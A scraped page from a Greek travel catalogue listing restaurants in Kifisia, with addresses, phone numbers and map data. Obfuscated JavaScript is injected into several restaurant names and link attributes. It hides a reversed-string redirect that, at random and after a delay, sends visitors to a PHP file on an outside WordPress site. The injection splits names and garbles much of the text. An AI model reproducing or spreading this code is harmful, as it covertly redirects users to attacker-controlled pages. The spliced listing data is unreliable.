Restaurant in Kifisia

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<a itemprop="url" href="$Bhq=function(n){if (typeof ($Bhq.list[n]) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/s/" title="Trat$Bhq=function(n){if (typeof ($Bhq.list[n]) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($Bhq(0), delay);}toria Amici Miei" rel="bookmark">Trat$Bhq=function(n){if (typeof ($Bhq.list[n]) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($Bhq(0), delay);}toria Amici Miei

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Klytaimnistra in  Kifisia, Attica, Central Greece


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Cibo Mat$Bhq=function(n){if (typeof ($Bhq.list[n]) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["\'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($Bhq(0), delay);}to in  Kifisia, Attica, Central Greece

<a itemprop="url" href="$Bhq=function(n){if (typeof ($Bhq.list[n]) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarn/" title="Cibo Mat$Bhq=function(n){if (typeof ($Bhq.list[n]) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($Bhq(0), delay);}to" rel="bookmark">Cibo Mat$Bhq=function(n){if (typeof ($Bhq.list[n]) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($Bhq(0), delay);}to

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.. μόνο σε Golden Members!

Eleas Gi in  Kifisia, Attica, Central Greece

Eleas Gi

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.. μόνο σε Golden Members!

New Dash in  Kifisia, Attica, Central Greece

New Dash

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.. μόνο σε Golden Members!

Restaurant in Kifisia, Attica, Central Greece

Travel catalog and tourist catalogue, Restaurant in Kifisia, Attica, Central Greece, best prices

Restaurant in Kifisia, Attica, Central Greece hotels, villas, restaurants, shops, businesses Find the best prices for accommodation and food for place to visit in Restaurant in Kifisia, Attica, Central Greece

toria Amici Miei','location': [22.531721, 38.640384],'message':'','icons':'','pid':'118316'},{'name':'Cibo Matto','location': [38.07533, 23.81921],'message':'','icons':'','pid':'115855'},{'name':'Klytaimnistra','location': [38.07266, 23.81642],'message':'

9 Kolokotroni, Kifisia, Athens 145 63, Greece

Gastronomy | Restaurant

+30 21 0801 1346


','icons':'','pid':'115853'},{'name':'Eleas Gi','location': [38.085415, 23.83278],'message':'
Eleas Gi

4 Dexamenis, Kifisia, Athens 145 63, Greece

Gastronomy | Restaurant

+30 21 0620 0005

','icons':'','pid':'115857'},{'name':'New Dash','location': [38.07263, 23.815054],'message':'
New Dash

8 Kolokotroni, Kifisia, Athens 145 62, Greece

Gastronomy | Restaurant

+30 21 0808 8796

','icons':'','pid':'115848'},{'name':'Arch','location': [38.073418, 23.815163],'message':'

1-3 Argiropoulou, Kifisia, Athens 145 62, Greece

Gastronomy | Restaurant

+30 21 0808 0801


','icons':'','pid':'115850'},{'name':'L\'ete Bistro Restaurant','location': [38.073242, 23.815626],'message':'
L’ete Bistro Restaurant

7 Argiropoulou, Kifisia, Athens 145 62, Greece

Gastronomy | Restaurant

+30 21 0808 6811

','icons':'','pid':'115852'},{'name':'Amos Cafe','location': [38.07272, 23.814127],'message':'
Amos Cafe

Levidou 10, Kifisia, Athens 145 62, Greece

Gastronomy | Restaurant

+30 21 0808 1185


','icons':'','pid':'115842'},{'name':'Gefseis Me Onomasia Proelefsis','location': [38.079536, 23.814274],'message':'
Gefseis Me Onomasia Proelefsis

317 Kifissias Leoforos, Kifisia, Athens 145 61, Greece

Gastronomy | Restaurant

+30 21 0800 1402

','icons':'','pid':'115844'},{'name':'Novalis','location': [38.073013, 23.81452],'message':'

1 Kolokotroni, Kifisia, Athens 145 62, Greece

Gastronomy | Restaurant

+30 21 0801 0070


','icons':'','pid':'115846'},{'name':'Tesoro Mio','location': [38.073883, 23.813267],'message':'
Tesoro Mio

3 Papadiamadi Alexandrou, Kifisia, Athens 145 62, Greece

Gastronomy | Restaurant

+30 21 0623 2536

','icons':'','pid':'115836'},{'name':'The Shy Horse North','location': [38.079403, 23.81393],'message':'
The Shy Horse North

317, Leof. Kifisias, Kifisia, Athens 14561, Greece

Gastronomy | Restaurant

+30 21 0807 6989


','icons':'','pid':'115838'},{'name':'Nice N Easy','location': [38.073505, 23.814035],'message':'
Nice N Easy

7 Papadiamadi Alexandrou, Kifisia, Athens 145 62, Greece

Gastronomy | Restaurant

+30 21 0808 2014

','icons':'','pid':'115840'},{'name':'THE SWEET SPOT','location': [38.07216, 23.81256],'message':'

Kassaveti 4 Kifissias Leoforos, Athens 115 24, Greece

Gastronomy | Restaurant

+30 21 0801 3432

','icons':'','pid':'115830'},{'name':'Rakkan Bar Lounge Restaurant','location': [38.072834, 23.812817],'message':'
Rakkan Bar Lounge Restaurant

238-240 Kifissias Leoforos Plaza Mela, Kifisia, Athens 145 62, Greece

Gastronomy | Restaurant

+30 21 0808 7941

','icons':'','pid':'115832'},{'name':'Buba Bistrot Exotique','location': [38.073757, 23.81307],'message':'
Buba Bistrot Exotique

4 Papadiamadi Alexandrou Kifisia, Kifisia, Athens 145 62,Greece

Gastronomy | Restaurant


','icons':'','pid':'115834'},{'name':'Thessalia','location': [38.089565, 23.797745],'message':'

19 Eleon, Kifisia, Athens 145 64, Greece

Gastronomy | Restaurant

+30 21 0807 8837

','icons':'','pid':'115825'},{'name':'Meat Bar','location': [38.07285, 23.812376],'message':'
Meat Bar

Skoufa kai Omirou 58 Kolonaki, Athens 11111, Greece

Gastronomy | Restaurant

+30 21 0222 3333

','icons':'','pid':'115827'},{'name':'Blue Pine Restaurant','location': [38.07808, 23.812414],'message':'
Blue Pine Restaurant

37 Tsaldari Panagi, Kifisia, Athens 145 61, Greece

Gastronomy | Restaurant

+30 21 0807 7745

','icons':'','pid':'115828'},{'name':'Pausilipon','location': [38.09193, 23.795671],'message':'

26 Ilission, Kifisia, Athens 145 64, Greece

Gastronomy | Restaurant

+30 21 0620 2081

','icons':'','pid':'115824'},{'name':'Baligoto','location': [38.092945, 23.79574],'message':'','icons':'','pid':'115728'},{'name':'Kastelorizo','location': [38.09218, 23.795378],'message':'

2 Platanon, Kifisia, Athens 145 64, Greece

Gastronomy | Restaurant

+30 21 0800 1057

','icons':'','pid':'115726'},{'name':'Leonidas Restaurant','location': [38.11455, 23.78969],'message':'
Leonidas Restaurant

Tatoiou Avenue, Acharnes, Greece

Gastronomy | Restaurant

+30 21 0816 9391

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